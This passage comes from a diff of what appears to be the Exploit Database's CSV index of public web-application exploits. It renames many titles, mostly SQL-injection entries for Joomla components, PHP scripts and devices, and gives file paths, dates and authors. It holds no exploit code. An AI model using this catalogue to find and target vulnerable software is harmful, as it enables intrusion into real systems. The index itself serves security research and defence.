Sencan",php,webapps,0 41602,platforms/php/webapps/41602.txt,"Joomla! Component Vik Appointments 1.5 - SQL Injection",2017-03-15,"Ihsan Sencan",php,webapps,0 41603,platforms/php/webapps/41603.txt,"Joomla! Component Vik Rent Items 1.3 - SQL Injection",2017-03-15,"Ihsan Sencan",php,webapps,0 41604,platforms/php/webapps/41604.txt,"Joomla! Component Vik Rent Car 1.11 - SQL Injection",2017-03-15,"Ihsan Sencan",php,webapps,0 @@ -38155,27 +38156,27 @@ id,file,description,date,author,platform,type,port 41618,platforms/aspx/webapps/41618.txt,"Sitecore CMS 8.1 Update-3 - Cross-Site Scripting",2017-03-15,"Pralhad Chaskar",aspx,webapps,0 41622,platforms/php/webapps/41622.py,"Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download",2017-03-16,"The Martian",php,webapps,0 41625,platforms/hardware/webapps/41625.txt,"AXIS Communications - Cross-Site Scripting / Content Injection",2017-03-17,Orwelllabs,hardware,webapps,0 -41626,platforms/hardware/webapps/41626.txt,"AXIS Multiple Products - Cross-Site Request Forgery",2017-03-17,Orwelllabs,hardware,webapps,0 +41626,platforms/hardware/webapps/41626.txt,"AXIS (Multiple Products) - Cross-Site Request Forgery",2017-03-17,Orwelllabs,hardware,webapps,0 41627,platforms/php/webapps/41627.txt,"Departmental Store Management System 1.2 - SQL Injection",2017-03-17,"Ihsan Sencan",php,webapps,0 41628,platforms/linux/webapps/41628.py,"Cobbler 2.8.0 - Authenticated Remote Code Execution",2017-03-16,"Dolev Farhi",linux,webapps,0 41632,platforms/php/webapps/41632.txt,"iFdate Social Dating Script 2.0 - SQL Injection",2017-03-18,"Ihsan Sencan",php,webapps,0 41633,platforms/hardware/webapps/41633.txt,"DIGISOL DG-HR1400 1.00.02 Wireless Router - Privilege Escalation",2017-03-18,Indrajith.A.N,hardware,webapps,0 41634,platforms/php/webapps/41634.txt,"Omegle Clone - SQL Injection",2017-03-18,"Ihsan Sencan",php,webapps,0 -41636,platforms/php/webapps/41636.txt,"Secure Download Links - 'dc' Parameter SQL Injection",2017-03-19,"Ihsan Sencan",php,webapps,0 -41641,platforms/php/webapps/41641.txt,"Joomla! Component JooCart 2.x - 'product_id' Parameter SQL Injection",2017-03-20,"Ihsan Sencan",php,webapps,0 -41642,platforms/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' Parameter SQL Injection",2017-03-20,"Ihsan Sencan",php,webapps,0 +41636,platforms/php/webapps/41636.txt,"Secure Download Links - 'dc' SQL Injection",2017-03-19,"Ihsan Sencan",php,webapps,0 +41641,platforms/php/webapps/41641.txt,"Joomla! Component JooCart 2.x - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",php,webapps,0 +41642,platforms/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",php,webapps,0 41644,platforms/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",php,webapps,80 41662,platforms/hardware/webapps/41662.py,"D-Link DGS-1510 - Multiple Vulnerabilities",2017-03-20,"Varang Amin",hardware,webapps,0 -41663,platforms/php/webapps/41663.txt,"Joomla! Component Extra Search 2.2.8 - 'establename' Parameter SQL Injection",2017-03-21,"Ihsan Sencan",php,webapps,0 +41663,platforms/php/webapps/41663.txt,"Joomla! Component Extra Search 2.2.8 - 'establename' SQL Injection",2017-03-21,"Ihsan Sencan",php,webapps,0 41665,platforms/php/webapps/41665.txt,"GLink Word Link Script 1.2.3 - SQL Injection",2017-03-22,"Ihsan Sencan",php,webapps,0 41671,platforms/hardware/webapps/41671.txt,"Solare Datensysteme Solar-Log Devices 2.8.4-56/3.5.2-85 - Multiple Vulnerabilities",2017-03-22,"SEC Consult",hardware,webapps,0 -41673,platforms/php/webapps/41673.txt,"Joomla! Component Modern Booking 1.0 - 'coupon' Parameter SQL Injection",2017-03-22,"Hamed Izadi",php,webapps,0 +41673,platforms/php/webapps/41673.txt,"Joomla! Component Modern Booking 1.0 - 'coupon' SQL Injection",2017-03-22,"Hamed Izadi",php,webapps,0 41674,platforms/php/webapps/41674.txt,"Flippa Clone - SQL Injection",2017-03-23,"Ihsan Sencan",php,webapps,0 41676,platforms/linux/webapps/41676.rb,"Centreon < 2.5.1 / Centreon Enterprise Server < 2.2 - SQL Injection / Command Injection (Metasploit)",2014-10-15,Metasploit,linux,webapps,0 41677,platforms/linux/webapps/41677.rb,"D-Link/TRENDnet - NCC Service Command Injection (Metasploit)",2015-02-26,Metasploit,linux,webapps,0 -41787,platforms/php/webapps/41787.txt,"Maian Uploader 4.0 - 'user' Parameter SQL Injection",2017-04-04,"Ihsan Sencan",php,webapps,0 -41788,platforms/php/webapps/41788.txt,"Maian Survey 1.1 - 'survey' Parameter SQL Injection",2017-04-04,"Ihsan Sencan",php,webapps,0 -41789,platforms/php/webapps/41789.txt,"Maian Greetings 2.1 - 'cat' Parameter SQL Injection",2017-04-04,"Ihsan Sencan",php,webapps,0 +41787,platforms/php/webapps/41787.txt,"Maian Uploader 4.0 - 'user' SQL Injection",2017-04-04,"Ihsan Sencan",php,webapps,0 +41788,platforms/php/webapps/41788.txt,"Maian Survey 1.1 - 'survey' SQL Injection",2017-04-04,"Ihsan Sencan",php,webapps,0 +41789,platforms/php/webapps/41789.txt,"Maian Greetings 2.1 - 'cat' SQL Injection",2017-04-04,"Ihsan Sencan",php,webapps,0 41685,platforms/multiple/webapps/41685.rb,"MantisBT 1.2.0a3 < 1.2.17 - XmlImportExport Plugin PHP Code Injection (Metasploit)",2014-11-18,Metasploit,multiple,webapps,0 41686,platforms/multiple/webapps/41686.rb,"OP5 5.3.5/5.4.0/5.4.2/5.5.0/5.5.1 - 'license.php' Remote Command Execution (Metasploit)",2015-01-25,Metasploit,multiple,webapps,0 41687,platforms/multiple/webapps/41687.rb,"OP5 5.3.5/5.4.0/5.4.2/5.5.0/5.5.1 - 'welcome' Remote Command Execution (Metasploit)",2015-01-05,Metasploit,multiple,webapps,0 @@ -38206,16 +38207,16 @@ id,file,description,date,author,platform,type,port 41731,platforms/php/webapps/41731.txt,"Delux Same Day Delivery Script 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0 41732,platforms/php/webapps/41732.txt,"Hotel Booking Script 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0 41733,platforms/php/webapps/41733.txt,"Tour Package Booking 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",php,webapps,0 -41735,platforms/php/webapps/41735.txt,"Professional Bus Booking Script - 'hid_Busid' Parameter SQL Injection",2017-03-27,"Ihsan Sencan",php,webapps,0 -41736,platforms/php/webapps/41736.txt,"CouponPHP CMS 3.1 - 'code' Parameter SQL Injection",2017-03-27,"Ihsan Sencan",php,webapps,0 +41735,platforms/php/webapps/41735.txt,"Professional Bus Booking Script - 'hid_Busid' SQL Injection",2017-03-27,"Ihsan Sencan",php,webapps,0 +41736,platforms/php/webapps/41736.txt,"CouponPHP CMS 3.1 - 'code' SQL Injection",2017-03-27,"Ihsan Sencan",php,webapps,0 41746,platforms/php/webapps/41746.txt,"EyesOfNetwork (EON) 5.0 - Remote Code Execution",2017-03-27,Sysdream,php,webapps,0 41747,platforms/php/webapps/41747.txt,"EyesOfNetwork (EON) 5.0 - SQL Injection",2017-03-27,Sysdream,php,webapps,0 41748,platforms/jsp/webapps/41748.rb,"Nuxeo 6.0/7.1/7.2/7.3 - Remote Code Execution (Metasploit)",2017-03-27,Sysdream,jsp,webapps,0 41749,platforms/php/webapps/41749.txt,"inoERP 0.6.1 - Cross-Site Scripting / Cross-Site Request Forgery / SQL Injection / Session Fixation",2017-03-27,"Tim Herres",php,webapps,0 -41758,platforms/php/webapps/41758.txt,"Opensource Classified Ads Script - 'keyword' Parameter SQL Injection",2017-03-29,"Ihsan Sencan",php,webapps,0 +41758,platforms/php/webapps/41758.txt,"Opensource Classified Ads Script - 'keyword' SQL Injection",2017-03-29,"Ihsan Sencan",php,webapps,0 41774,platforms/php/webapps/41774.py,"EyesOfNetwork (EON) 5.1 - SQL Injection",2017-03-29,"Dany Bach",php,webapps,0 41779,platforms/multiple/webapps/41779.txt,"Splunk Enterprise - Information Disclosure",2017-03-31,hyp3rlinx,multiple,webapps,0 -41780,platforms/php/webapps/41780.txt,"Membership Formula - 'order' Parameter SQL Injection",2017-03-31,"Ihsan Sencan",php,webapps,0 +41780,platforms/php/webapps/41780.txt,"Membership Formula - 'order' SQL Injection",2017-03-31,"Ihsan Sencan",php,webapps,0 41816,platforms/php/webapps/41816.txt,"ImagePro Lazygirls Clone Script - SQL Injection",2017-04-05,"Ihsan Sencan",php,webapps,0 41817,platforms/php/webapps/41817.txt,"Airbnb Crashpadder Clone Script - SQL Injection",2017-04-05,"Ihsan Sencan",php,webapps,0 41818,platforms/php/webapps/41818.txt,"Premium Penny Auction Script - SQL Injection",2017-04-05,"Ihsan Sencan",php,webapps,0 @@ -38227,15 +38228,15 @@ id,file,description,date,author,platform,type,port 41824,platforms/php/webapps/41824.txt,"HelpDEZK 1.1.1 - Cross-Site Request Forgery / Code Execution",2017-04-05,rungga_reksya,php,webapps,0 41829,platforms/hardware/webapps/41829.txt,"Intellinet NFC-30IR Camera - Multiple Vulnerabilities",2017-04-07,"Dimitri Fousekis",hardware,webapps,0 41830,platforms/php/webapps/41830.txt,"Faveo Helpdesk Community 1.9.3 - Cross-Site Request Forgery",2017-04-05,rungga_reksya,php,webapps,0 -41831,platforms/php/webapps/41831.txt,"Invoice Template - 'hash' Parameter SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps,0 -41832,platforms/php/webapps/41832.txt,"Document Management Template - 'hash' Parameter SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps,0 -41833,platforms/php/webapps/41833.txt,"Shopping Cart Template - 'item' Parameter SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps,0 -41834,platforms/php/webapps/41834.txt,"Calendar Template 2.0 - 'editid1' Parameter SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps,0 +41831,platforms/php/webapps/41831.txt,"Invoice Template - 'hash' SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps,0 +41832,platforms/php/webapps/41832.txt,"Document Management Template - 'hash' SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps,0 +41833,platforms/php/webapps/41833.txt,"Shopping Cart Template - 'item' SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps,0 +41834,platforms/php/webapps/41834.txt,"Calendar Template 2.0 - 'editid1' SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps,0 41835,platforms/php/webapps/41835.txt,"Forum Template 1.0 - SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps,0 -41836,platforms/php/webapps/41836.txt,"Quiz Template 1.0 - 'testid' Parameter SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps,0 -41837,platforms/php/webapps/41837.txt,"Survey Template 1.1 - 'masterkey1' Parameter SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps,0 +41836,platforms/php/webapps/41836.txt,"Quiz Template 1.0 - 'testid' SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps,0 +41837,platforms/php/webapps/41837.txt,"Survey Template 1.1 - 'masterkey1' SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps,0 41838,platforms/php/webapps/41838.txt,"My Gaming Ladder Combo System 7.5 - SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps,0 -41839,platforms/php/webapps/41839.txt,"Ladder System 6.0 - 'faqid' Parameter SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps,0 +41839,platforms/php/webapps/41839.txt,"Ladder System 6.0 - 'faqid' SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps,0 41840,platforms/hardware/webapps/41840.txt,"D-Link DWR-116 / DWR-116A1 - Arbitrary File Download",2017-04-07,"Patryk Bogdan",hardware,webapps,0 41841,platforms/php/webapps/41841.html,"WordPress Plugin Firewall 2 1.3 - Cross-Site Request Forgery / Cross-Site Scripting",2017-04-07,dxw,php,webapps,80 41842,platforms/cgi/webapps/41842.txt,"QNAP TVS-663 QTS < 4.2.4 build 20170313 - Command Injection",2017-04-07,"Harry Sintonen",cgi,webapps,0 @@ -38247,15 +38248,15 @@ id,file,description,date,author,platform,type,port 42090,platforms/multiple/webapps/42090.txt,"KEMP LoadMaster 7.135.0.13245 - Persistent Cross-Site Scripting / Remote Code Execution",2017-05-30,SecuriTeam,multiple,webapps,0 42091,platforms/windows/webapps/42091.txt,"IBM Informix Dynamic Server / Informix Open Admin Tool - DLL Injection / Remote Code Execution / Heap Buffer Overflow",2017-05-30,SecuriTeam,windows,webapps,0 41849,platforms/php/webapps/41849.txt,"Jobscript4Web 4.5 - Authentication Bypass",2017-04-08,TurkCyberArmy,php,webapps,0 -41855,platforms/xml/webapps/41855.sh,"Adobe Multiple Products - XML Injection File Content Disclosure",2017-04-07,"Thomas Sluyter",xml,webapps,8400 +41855,platforms/xml/webapps/41855.sh,"Adobe (Multiple Products) - XML Injection File Content Disclosure",2017-04-07,"Thomas Sluyter",xml,webapps,8400 41856,platforms/php/webapps/41856.txt,"MyClassifiedScript 5.1 - SQL Injection",2017-04-11,"Ihsan Sencan",php,webapps,0 41858,platforms/php/webapps/41858.txt,"Social Directory Script 2.0 - SQL Injection",2017-04-11,"Ihsan Sencan",php,webapps,0 -41859,platforms/php/webapps/41859.txt,"FAQ Script 3.1.3 - 'category_id' Parameter SQL Injection",2017-04-11,"Ihsan Sencan",php,webapps,0 +41859,platforms/php/webapps/41859.txt,"FAQ Script 3.1.3 - 'category_id' SQL Injection",2017-04-11,"Ihsan Sencan",php,webapps,0 41857,platforms/php/webapps/41857.txt,"WordPress Plugin Spider Event Calendar 1.5.51 - Blind SQL Injection",2017-04-11,"Manuel García Cárdenas",php,webapps,80 41860,platforms/php/webapps/41860.txt,"MyBB < 1.8.11 - 'email' MyCode Cross-Site Scripting",2017-04-11,"Zhiyang Zeng",php,webapps,80 41862,platforms/php/webapps/41862.txt,"MyBB smilie Module < 1.8.11 - 'pathfolder' Directory Traversal",2017-04-11,"Zhiyang Zeng",php,webapps,80 41863,platforms/hardware/webapps/41863.php,"Brother MFC-J6520DW - Authentication Bypass / Password Change",2017-04-11,"Patryk Bogdan",hardware,webapps,0 -41864,platforms/php/webapps/41864.txt,"Horde Groupware Webmail 3/4/5 - Multiple Remote Code Execution",2017-04-11,SecuriTeam,php,webapps,0 +41864,platforms/php/webapps/41864.txt,"Horde Groupware Webmail 3/4/5 - Multiple Remote Code Executions",2017-04-11,SecuriTeam,php,webapps,0 41865,platforms/multiple/webapps/41865.html,"Apple WebKit / Safari 10.0.3 (12602.4.8) - Synchronous Page Load Universal Cross-Site Scripting",2017-04-11,"Google Security Research",multiple,webapps,0 41866,platforms/multiple/webapps/41866.html,"Apple WebKit / Safari 10.0.3 (12602.4.8) - Universal Cross-Site Scripting via a Focus Event and a Link Element",2017-04-11,"Google Security Research",multiple,webapps,0 41876,platforms/php/webapps/41876.txt,"Coppermine Gallery < 1.5.44 - Directory Traversal Weaknesses",2017-02-15,"Hacker Fantastic",php,webapps,0 @@ -38275,7 +38276,7 @@ id,file,description,date,author,platform,type,port 41926,platforms/jsp/webapps/41926.txt,"Oracle E-Business Suite 12.2.3 - 'IESFOOTPRINT' SQL Injection",2017-04-25,ERPScan,jsp,webapps,0 41927,platforms/multiple/webapps/41927.txt,"HPE OpenCall Media Platform (OCMP) 4.3.2 - Cross-Site Scripting / Remote File Inclusion",2017-04-25,"Paolo Stagno",multiple,webapps,0 41928,platforms/multiple/webapps/41928.py,"OpenText Documentum Content Server - dm_bp_transition.ebs docbase Method Arbitrary Code Execution",2017-04-25,"Andrey B. Panfilov",multiple,webapps,0 -41930,platforms/php/webapps/41930.txt,"Joomla! Component Myportfolio 3.0.2 - 'pid' Parameter SQL Injection",2017-04-24,"Persian Hack Team",php,webapps,0 +41930,platforms/php/webapps/41930.txt,"Joomla! Component Myportfolio 3.0.2 - 'pid' SQL Injection",2017-04-24,"Persian Hack Team",php,webapps,0 41936,platforms/php/webapps/41936.txt,"October CMS 1.0.412 - Multiple Vulnerabilities",2017-04-25,"Anti Räis",php,webapps,80 41939,platforms/php/webapps/41939.txt,"Revive Ad Server 4.0.1 - Cross-Site Scripting / Cross-Site Request Forgery",2017-04-26,"Cyril Vallicari",php,webapps,0 41940,platforms/php/webapps/41940.py,"TYPO3 Extension News - SQL Injection",2017-04-27,"Charles Fol",php,webapps,80 @@ -38292,7 +38293,7 @@ id,file,description,date,author,platform,type,port 41962,platforms/linux/webapps/41962.sh,"WordPress 4.6 - Unauthenticated Remote Code Execution",2017-05-03,"Dawid Golunski",linux,webapps,0 41963,platforms/linux/webapps/41963.txt,"WordPress < 4.7.4 - Unauthorized Password Reset",2017-05-03,"Dawid Golunski",linux,webapps,0 41966,platforms/php/webapps/41966.txt,"WordPress Plugin WebDorado Gallery 1.3.29 - SQL Injection",2017-05-05,defensecode,php,webapps,80 -41967,platforms/php/webapps/41967.txt,"ViMbAdmin 3.0.15 - Multiple Cross-Site Request Forgery",2017-05-05,Sysdream,php,webapps,80 +41967,platforms/php/webapps/41967.txt,"ViMbAdmin 3.0.15 - Multiple Cross-Site Request Forgery Vulnerabilities",2017-05-05,Sysdream,php,webapps,80 41976,platforms/linux/webapps/41976.py,"LogRhythm Network Monitor - Authentication Bypass / Command Injection",2017-04-24,"Francesco Oddo",linux,webapps,0 41979,platforms/php/webapps/41979.txt,"I_ Librarian 4.6/4.7 - Command Injection / Server Side Request Forgery / Directory Enumeration / Cross-Site Scripting",2017-05-09,"SEC Consult",php,webapps,0 41985,platforms/aspx/webapps/41985.txt,"Personify360 7.5.2/7.6.1 - Improper Access Restrictions",2017-05-09,"Pesach Zirkind",aspx,webapps,0 @@ -38340,7 +38341,7 @@ id,file,description,date,author,platform,type,port 42106,platforms/multiple/webapps/42106.html,"WebKit - 'CachedFrameBase::restore' Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0 42107,platforms/multiple/webapps/42107.html,"WebKit - 'Document::prepareForDestruction' / 'CachedFrame' Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0 42111,platforms/json/webapps/42111.txt,"Sungard eTRAKiT3 <= 3.2.1.17 - SQL Injection",2017-06-02,"Goran Tuzovic",json,webapps,0 -42113,platforms/php/webapps/42113.txt,"Joomla! Component Payage 2.05 - 'aid' Parameter SQL Injection",2017-06-03,"Persian Hack Team",php,webapps,0 +42113,platforms/php/webapps/42113.txt,"Joomla! Component Payage 2.05 - 'aid' SQL Injection",2017-06-03,"Persian Hack Team",php,webapps,0 42114,platforms/hardware/webapps/42114.py,"EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 - Remote Code Execution",2017-06-04,LiquidWorm,hardware,webapps,0 42117,platforms/windows/webapps/42117.txt,"Subsonic 6.1.1 - Cross-Site Request Forgery",2017-06-05,hyp3rlinx,windows,webapps,0 42118,platforms/windows/webapps/42118.txt,"Subsonic 6.1.1 - Server-Side Request Forgery",2017-06-05,hyp3rlinx,windows,webapps,0 @@ -38410,7 +38411,7 @@ id,file,description,date,author,platform,type,port 42345,platforms/cgi/webapps/42345.rb,"Netscaler SD-WAN 9.1.2.26.561201 - Command Injection (Metasploit)",2017-07-19,xort,cgi,webapps,0 42344,platforms/cgi/webapps/42344.rb,"Sonicwall < 8.1.0.2-14sv - 'sitecustomization.cgi' Command Injection (Metasploit)",2017-07-19,xort,cgi,webapps,0 42346,platforms/cgi/webapps/42346.txt,"Citrix CloudBridge - 'CAKEPHP' Cookie Command Injection",2017-07-19,xort,cgi,webapps,0 -42347,platforms/php/webapps/42347.txt,"Joomla! Component JoomRecipe 1.0.4 - 'search_author' Parameter SQL Injection",2017-07-20,Teng,php,webapps,0 +42347,platforms/php/webapps/42347.txt,"Joomla! Component JoomRecipe 1.0.4 - 'search_author' SQL Injection",2017-07-20,Teng,php,webapps,0 42348,platforms/php/webapps/42348.txt,"Tilde CMS 1.01 - Multiple Vulnerabilities",2017-07-20,"Raffaele Forte",php,webapps,0 42351,platforms/php/webapps/42351.txt,"WordPress Plugin IBPS Online Exam 1.0 - SQL Injection / Cross-Site Scripting",2017-07-20,8bitsec,php,webapps,0 42352,platforms/hardware/webapps/42352.txt,"VACRON VIG-US731VE 1.0.18-09-B727 IP Camera - Authentication Bypass",2017-07-20,Viktoras,hardware,webapps,0 @@ -38425,7 +38426,7 @@ id,file,description,date,author,platform,type,port 42383,platforms/php/webapps/42383.html,"Friends in War Make or Break 1.7 - Cross-Site Request Forgery (Change Admin Password)",2017-07-26,shinnai,php,webapps,0 42381,platforms/php/webapps/42381.txt,"Friends in War Make or Break 1.7 - SQL Injection",2017-07-26,"Ihsan Sencan",php,webapps,0 42543,platforms/java/webapps/42543.txt,"Automated Logic WebCTRL 6.1 - Path Traversal / Arbitrary File Write",2017-08-22,LiquidWorm,java,webapps,0 -42387,platforms/php/webapps/42387.txt,"Joomla! Component CCNewsLetter 2.1.9 - 'sbid' Parameter SQL Injection",2017-07-27,"Shahab Shamsi",php,webapps,0 +42387,platforms/php/webapps/42387.txt,"Joomla! Component CCNewsLetter 2.1.9 - 'sbid' SQL Injection",2017-07-27,"Shahab Shamsi",php,webapps,0 42388,platforms/hardware/webapps/42388.txt,"FortiOS < 5.6.0 - Cross-Site Scripting",2017-07-28,patryk_bogdan,hardware,webapps,0 42401,platforms/jsp/webapps/42401.rb,"Advantech SUSIAccess < 3.0 - Directory Traversal / Information Disclosure (Metasploit)",2017-08-01,"James Fitts",jsp,webapps,0 42402,platforms/jsp/webapps/42402.rb,"Advantech SUSIAccess < 3.0 - 'RecoveryMgmt' File Upload",2017-08-01,"James Fitts",jsp,webapps,0 @@ -38433,7 +38434,7 @@ id,file,description,date,author,platform,type,port 42404,platforms/php/webapps/42404.txt,"VehicleWorkshop - Arbitrary File Upload",2017-08-01,"Touhid M.Shaikh",php,webapps,0 42408,platforms/hardware/webapps/42408.txt,"SOL.Connect ISET-mpp meter 1.2.4.2 - SQL Injection",2017-08-01,"Andy Tan",hardware,webapps,0 42410,platforms/php/webapps/42410.txt,"JoySale 2.2.1 - Arbitrary File Upload",2017-08-01,"Mutlu Benmutlu",php,webapps,0 -42412,platforms/php/webapps/42412.txt,"Entrepreneur B2B Script - 'pid' Parameter SQL Injection",2017-08-02,"Meisam Monsef",php,webapps,0 +42412,platforms/php/webapps/42412.txt,"Entrepreneur B2B Script - 'pid' SQL Injection",2017-08-02,"Meisam Monsef",php,webapps,0 42413,platforms/php/webapps/42413.txt,"Joomla! Component SIMGenealogy 2.1.5 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps,0 42414,platforms/php/webapps/42414.txt,"Joomla! Component PHP-Bridge 1.2.3 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps,0 42415,platforms/php/webapps/42415.txt,"Joomla! Component LMS King Professional 3.2.4.0 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps,0 @@ -38441,7 +38442,7 @@ id,file,description,date,author,platform,type,port 42417,platforms/php/webapps/42417.txt,"Joomla! Component Ultimate Property Listing 1.0.2 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps,0 42419,platforms/php/webapps/42419.txt,"Premium Servers List Tracker 1.0 - SQL Injection",2017-08-02,"Kaan KAMIS",php,webapps,0 42420,platforms/php/webapps/42420.txt,"EDUMOD Pro 1.3 - SQL Injection",2017-08-02,"Kaan KAMIS",php,webapps,0 -42421,platforms/php/webapps/42421.txt,"Muviko 1.0 - 'q' Parameter SQL Injection",2017-08-02,"Kaan KAMIS",php,webapps,0 +42421,platforms/php/webapps/42421.txt,"Muviko 1.0 - 'q' SQL Injection",2017-08-02,"Kaan KAMIS",php,webapps,0 42635,platforms/php/webapps/42635.txt,"Escort Marketplace 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0 42423,platforms/php/webapps/42423.txt,"Joomla! Component StreetGuessr Game 1.1.8 - SQL Injection",2017-08-03,"Ihsan Sencan",php,webapps,0 42427,platforms/hardware/webapps/42427.html,"Technicolor TC7337 - 'SSID' Persistent Cross-Site Scripting",2017-08-03,"Geolado giolado",hardware,webapps,0 @@ -38496,20 +38497,20 @@ id,file,description,date,author,platform,type,port 42514,platforms/php/webapps/42514.txt,"iTech Dating Script 3.40 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0 42515,platforms/php/webapps/42515.txt,"iTech Job Script 9.27 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0 42516,platforms/php/webapps/42516.txt,"iTech Movie Script 7.51 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0 -42524,platforms/php/webapps/42524.txt,"Joomla! Component Flip Wall 8.0 - 'wallid' Parameter SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 +42524,platforms/php/webapps/42524.txt,"Joomla! Component Flip Wall 8.0 - 'wallid' SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 42525,platforms/php/webapps/42525.txt,"Joomla! Component Sponsor Wall 8.0 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 42526,platforms/php/webapps/42526.txt,"PHP Classifieds Script 5.6.2 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 42527,platforms/php/webapps/42527.txt,"Affiliate Niche Script 3.4.0 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 -42528,platforms/php/webapps/42528.txt,"PHP Coupon Script 6.0 - 'cid' Parameter SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 +42528,platforms/php/webapps/42528.txt,"PHP Coupon Script 6.0 - 'cid' SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 42529,platforms/php/webapps/42529.txt,"iTech Social Networking Script 3.08 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 42530,platforms/php/webapps/42530.txt,"Joomla! Component FocalPoint 1.2.3 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 42531,platforms/php/webapps/42531.txt,"(Bitcoin / Dogecoin) PHP Cloud Mining Script - Authentication Bypass",2017-08-21,"Ihsan Sencan",php,webapps,0 42532,platforms/php/webapps/42532.txt,"Joomla! Component Ajax Quiz 1.8 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 -42533,platforms/php/webapps/42533.txt,"PHP-Lance 1.52 - 'subcat' Parameter SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 -42534,platforms/php/webapps/42534.txt,"PHP Jokesite 2.0 - 'joke_id' Parameter SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 +42533,platforms/php/webapps/42533.txt,"PHP-Lance 1.52 - 'subcat' SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 +42534,platforms/php/webapps/42534.txt,"PHP Jokesite 2.0 - 'joke_id' SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0 42535,platforms/php/webapps/42535.txt,"PHPMyWind 5.3 - Cross-Site Scripting",2017-08-21,小雨,php,webapps,0 42561,platforms/php/webapps/42561.txt,"Joomla! Component OSDownloads 1.7.4 - SQL Injection",2017-08-25,"Ihsan Sencan",php,webapps,0 -42562,platforms/php/webapps/42562.txt,"AutoCar 1.1 - 'category' Parameter SQL Injection",2017-08-25,"Bora Bozdogan",php,webapps,0 +42562,platforms/php/webapps/42562.txt,"AutoCar 1.1 - 'category' SQL Injection",2017-08-25,"Bora Bozdogan",php,webapps,0 42564,platforms/php/webapps/42564.txt,"Joomla! Component Responsive Portfolio 1.6.1 - SQL Injection",2017-08-25,"Ihsan Sencan",php,webapps,0 42566,platforms/php/webapps/42566.txt,"Matrimonial Script 2.7 - Authentication Bypass",2017-08-27,"Ali BawazeEer",php,webapps,0 42569,platforms/php/webapps/42569.txt,"Smart Chat 1.0.0 - SQL Injection",2017-08-28,"Ihsan Sencan",php,webapps,0 @@ -38517,7 +38518,7 @@ id,file,description,date,author,platform,type,port 42571,platforms/php/webapps/42571.txt,"WYSIWYG HTML Editor PRO 1.0 - Arbitrary File Download",2017-08-28,"Ihsan Sencan",php,webapps,0 42572,platforms/php/webapps/42572.txt,"Easy Web Search 4.0 - SQL Injection",2017-08-28,"Ihsan Sencan",php,webapps,0 42573,platforms/php/webapps/42573.txt,"PHP Search Engine 1.0 - SQL Injection",2017-08-28,"Ihsan Sencan",php,webapps,0 -42574,platforms/php/webapps/42574.txt,"Flash Poker 2.0 - 'game' Parameter SQL Injection",2017-08-28,"Ihsan Sencan",php,webapps,0 +42574,platforms/php/webapps/42574.txt,"Flash Poker 2.0 - 'game' SQL Injection",2017-08-28,"Ihsan Sencan",php,webapps,0 42575,platforms/php/webapps/42575.txt,"Login-Reg Members Management PHP 1.0 - Arbitrary File Upload",2017-08-28,"Ihsan Sencan",php,webapps,0 42577,platforms/php/webapps/42577.txt,"CMS Web-Gooroo < 1.141 - Multiple Vulnerabilities",2017-06-01,Kaimi,php,webapps,0 42578,platforms/php/webapps/42578.txt,"Schools Alert Management Script - Authentication Bypass",2017-08-28,"Ali BawazeEer",php,webapps,0 @@ -38538,7 +38539,7 @@ id,file,description,date,author,platform,type,port 42597,platforms/php/webapps/42597.txt,"Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.6 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0 42598,platforms/php/webapps/42598.txt,"Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.7 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0 42603,platforms/php/webapps/42603.txt,"FineCMS 1.0 - Multiple Vulnerabilities",2017-08-29,sohaip-hackerDZ,php,webapps,0 